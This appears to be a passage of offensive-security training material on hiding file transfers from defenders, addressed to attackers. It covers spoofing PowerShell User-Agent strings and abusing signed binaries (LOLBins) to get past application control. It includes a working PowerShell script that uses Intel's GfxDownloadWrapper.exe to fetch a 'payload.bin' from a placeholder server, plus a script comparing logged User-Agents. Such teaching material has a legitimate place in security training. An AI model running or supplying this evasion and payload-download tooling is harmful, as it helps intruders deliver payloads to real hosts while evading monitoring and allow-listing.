Evade Detection


πŸ•΅οΈ Evading Detection – Blending in With the Crowd

Good attackers hide. Great ones blend in. If your transfer techniques are getting flagged, it’s time to get stealthy.

Let’s explore how to evade detection by:

  • πŸ› οΈ Modifying user agents

  • πŸ₯· Leveraging LOLBins and GTFOBins

  • πŸ€– Using trusted binaries to download files


🦑 1. Changing User-Agent Strings

Many defenders alert on tool-specific User-Agent strings such as curl/7.68.0, WindowsPowerShell/5.1.14393.0 (what Invoke-WebRequest sends by default on Windows PowerShell; PowerShell 7 identifies itself as PowerShell/7.x) or Microsoft BITS/7.8. An HTTP download that announces itself as a scripting engine stands out in proxy logs, even when the destination looks harmless.

Luckily, Invoke-WebRequest (and Invoke-RestMethod) accept any string through the -UserAgent parameter, so the request can claim to come from a browser instead. 🎭


🧪 List Built-In PowerShell User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

You'll see options like:

  • Chrome: Mozilla/5.0 ... Chrome/7.0.500.0

  • Firefox: Gecko/20100401 Firefox/4.0

  • Safari: AppleWebKit/533.16

Caveat: these built-in values date from 2010 (Chrome 7, Firefox 4, Safari 5) and no current browser sends them, so a proxy that baselines browser versions can still single them out. For a convincing disguise, pass a current browser string to -UserAgent yourself rather than relying on the PSUserAgent constants.


🧠 Use a Fake Chrome User-Agent

Pass the built-in Chrome value (or a hand-written current browser string) to Invoke-WebRequest's -UserAgent parameter when fetching your file.

📡 The server will log the Chrome string you supplied instead of the PowerShell default.

✅ Much less suspicious than WindowsPowerShell/5.1.
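The following is an added example, not code from the original page: it runs a throwaway HTTP listener on loopback and records the User-Agent header that three Invoke-WebRequest variants present (the default, the built-in PSUserAgent::Chrome constant, and a hand-typed modern Chrome string), which is exactly what a web server access log or a proxy would see. It assumes Windows PowerShell 5.1 or PowerShell 7+ and that TCP port 8080 is free on 127.0.0.1; the modern Chrome string is a placeholder typed by hand.

```powershell
# Added example (not from the original page): show what a server logs for
# PowerShell's default User-Agent versus spoofed browser strings.
# Assumptions: PowerShell 5.1 or 7+, TCP 8080 free on 127.0.0.1, no outbound
# traffic needed. The "hand-rolled" string is a placeholder, not a real capture.

$port = 8080
$uri  = "http://127.0.0.1:$port/"

# Client variants to test. $null means "do not pass -UserAgent" (the default).
# PSUserAgent::Chrome still claims Chrome/7.0.500.0, a 2010 browser, so a
# hand-written current string is usually the better disguise.
$agents = [ordered]@{
    'default'     = $null
    'PSUserAgent' = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
    'hand-rolled' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36'
}

# Raw TCP listener rather than HttpListener so no HTTP.sys URL reservation
# (and no elevated prompt) is required.
$listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Loopback, $port)
$listener.Start()
try {
    foreach ($name in $agents.Keys) {
        # Fire the request from a background job so this thread can play server.
        $job = Start-Job -ArgumentList $uri, $agents[$name] -ScriptBlock {
            param($Uri, $UserAgent)
            $p = @{ Uri = $Uri; UseBasicParsing = $true }
            if ($UserAgent) { $p['UserAgent'] = $UserAgent }
            Invoke-WebRequest @p | Out-Null
        }

        # Server side: accept one connection, read the request headers up to the
        # blank line, and record the User-Agent exactly as an access log would.
        $client = $listener.AcceptTcpClient()
        $stream = $client.GetStream()
        $reader = [System.IO.StreamReader]::new($stream)
        $seen   = '(no User-Agent header)'
        while (($line = $reader.ReadLine()) -and $line -ne '') {
            if ($line -match '^User-Agent:\s*(.+)$') { $seen = $Matches[1] }
        }
        '{0,-12} {1}' -f $name, $seen

        # Minimal valid response so Invoke-WebRequest returns cleanly.
        $body   = 'ok'
        $writer = [System.IO.StreamWriter]::new($stream)
        $writer.Write("HTTP/1.1 200 OK`r`nContent-Length: $($body.Length)`r`nConnection: close`r`n`r`n$body")
        $writer.Flush()
        $client.Close()

        Wait-Job $job | Remove-Job
    }
} finally {
    $listener.Stop()
}
```

Run it once from a normal prompt and compare the three lines it prints: the first carries the WindowsPowerShell/ or PowerShell/ token that detection rules key on, the second carries the decade-old Chrome/7.0.500.0 string, and only the third looks like a browser a user would actually run today. If a request never arrives (for example the job's Invoke-WebRequest fails), AcceptTcpClient blocks; press Ctrl+C and check `Receive-Job` output.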


🧬 2. Living Off the Land – LOLBins & GTFOBins

When PowerShell, Netcat and any tooling you brought with you are blocked, turn to trusted system binaries that are already on the host, aka LOLBins 🪤 (living-off-the-land binaries; LOLBAS catalogues the Windows ones, GTFOBins the Unix ones).

These are binaries that:

  • ✅ Are pre-installed

  • ✅ Are signed by the vendor

  • ✅ Are allowed by application control (AppLocker, WDAC and similar allow-listing) because those policies typically trust signed vendor code


βš™οΈ Example: GfxDownloadWrapper.exe

A legitimate Intel binary that can download files from the web:

βœ… May bypass application whitelisting βœ… Could be excluded from AV logging or monitoring ❗ Found only on machines with Intel drivers
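An added example, not from the original page, of putting GfxDownloadWrapper.exe to work: it locates the binary in the driver store (the folder name carries a per-driver suffix, so the path cannot be hard-coded), checks the Authenticode signature that the whole technique relies on, then invokes it with the LOLBAS-documented argument order of URL followed by destination file. $Url and $Dest are placeholders for your own file server and output path; the script assumes an Intel graphics driver is installed.

```powershell
# Added example (not from the original page): use Intel's GfxDownloadWrapper.exe
# as a download LOLBin. Assumptions: an Intel graphics driver is installed;
# $Url and $Dest are placeholders you replace with your own server and path.

param(
    [string]$Url  = 'http://YOUR-SERVER/payload.bin',   # placeholder
    [string]$Dest = (Join-Path $env:TEMP 'payload.bin') # placeholder
)

$repo = Join-Path $env:SystemRoot 'System32\DriverStore\FileRepository'

# The containing folder is named like igdlh64.inf_amd64_<suffix>, which differs
# per driver version, so search for the file rather than hard-coding a path.
$bin = Get-ChildItem -Path $repo -Recurse -Filter 'GfxDownloadWrapper.exe' -ErrorAction SilentlyContinue |
       Sort-Object LastWriteTime -Descending |
       Select-Object -First 1
if (-not $bin) {
    throw 'GfxDownloadWrapper.exe not found: this host has no Intel graphics driver in the driver store.'
}

# Verify the signature: an unsigned or tampered copy would not receive the
# application-control pass that makes this binary worth using.
$sig = Get-AuthenticodeSignature -FilePath $bin.FullName
'{0}' -f $bin.FullName
'  signer: {0}' -f $sig.SignerCertificate.Subject
'  status: {0}' -f $sig.Status
if ($sig.Status -ne 'Valid') {
    throw "Refusing to use a binary whose signature status is '$($sig.Status)'."
}

# LOLBAS-documented usage: GfxDownloadWrapper.exe <url> <destination file>
& $bin.FullName $Url $Dest

# The wrapper is quiet, so confirm the result on disk instead of trusting its exit.
if (Test-Path -Path $Dest) {
    Get-Item -Path $Dest | Select-Object FullName, Length, LastWriteTime
} else {
    Write-Warning "Nothing was written to $Dest; check the URL and that this host can reach it."
}
```

The signature check is not just hygiene: Windows Defender Application Control and AppLocker publisher rules key on exactly that signer, and the same Get-AuthenticodeSignature call is what a defender would use to triage a suspicious download by this process. Note that the wrapper makes the request with its own User-Agent, so the blending advantage here comes from the process identity, not from the HTTP headers.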


🔗 Pro Resources

  • LOLBAS (Windows living-off-the-land binaries, scripts and libraries): https://lolbas-project.github.io/

  • GTFOBins (Unix binaries): https://gtfobins.github.io/

Tip: on GTFOBins, filter by function with the +file-download and +file-upload tags (for example https://gtfobins.github.io/#+file-download) to find binaries that fit your purpose; LOLBAS lists equivalent Download and Upload functions for each entry.

